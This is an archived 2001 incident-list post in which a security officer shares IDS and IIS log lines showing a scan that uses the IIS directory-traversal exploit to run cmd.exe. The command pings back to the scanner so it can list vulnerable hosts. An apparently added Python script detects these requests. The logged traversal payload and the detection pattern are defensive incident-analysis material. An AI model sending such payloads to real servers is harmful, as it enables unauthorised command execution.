Security Incidents mailing list archives
Sneaky vuln-scanning, vulnerable list generation
From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Fri, 27 Jul 2001 13:08:34 -0400
I don't think this is a worm. I think this is most probably a black-hat scanning technique. Note the command the scanner attempted to execute. A single ping-back to the scanning machine. This would allow the scanner to easily generate a list of vulnerable boxen.

Attached are intrusion detection system and webserver logs in EST.

Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2828 -> Pub.IP.Address:80
Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2927 -> Pub.IP.Address:80
Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80
Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80

2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
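A defender-side check for the pattern described in the message above, as an added example that is not part of the original post: it parses web server log lines in the field order shown in the excerpt and separates requests whose cmd.exe arguments ping the requesting address from other traversal attempts. The sample lines, addresses and the function names classify and pingback_sources are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (documentation addresses), in the field order of
# the web server log excerpt above; the second and third are contrast cases.
SAMPLE_LOG = [
    "2001-07-27 11:02:39 192.0.2.10 - 10.0.0.5 80 GET "
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe "
    "/c+ping+-n+1+-l+128+-w+1+192.0.2.10 501 -",
    "2001-07-27 11:03:02 192.0.2.44 - 10.0.0.5 80 GET "
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404 -",
    "2001-07-27 11:03:40 192.0.2.77 - 10.0.0.5 80 GET /default.htm - 200 -",
]

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) "
    r".*?(?:GET|HEAD|POST) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})\b")
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def classify(line):
    """Return a finding dict for traversal-to-cmd.exe requests, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Decode %5c and normalise separators before looking for the traversal.
    stem = unquote(m["stem"]).replace("\\", "/").lower()
    if "../" not in stem or not stem.endswith("/cmd.exe"):
        return None
    args = unquote(m["query"].replace("+", " ")).lower().split()
    # A ping aimed back at the requesting address marks the host-listing probe.
    called_back = "ping" in args and m["src"] in IPV4_RE.findall(" ".join(args))
    return {"ts": m["ts"], "src": m["src"], "status": int(m["status"]),
            "kind": "pingback" if called_back else "cmd-exec"}

def pingback_sources(lines):
    """Sorted unique client addresses that requested a ping to themselves."""
    hits = filter(None, map(classify, lines))
    return sorted({h["src"] for h in hits if h["kind"] == "pingback"})

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
    print("review egress ICMP logs for:", pingback_sources(SAMPLE_LOG))
```

Each finding keeps the response status, so non-success responses such as the 501 in the excerpt above can be triaged separately from requests the server may have acted on.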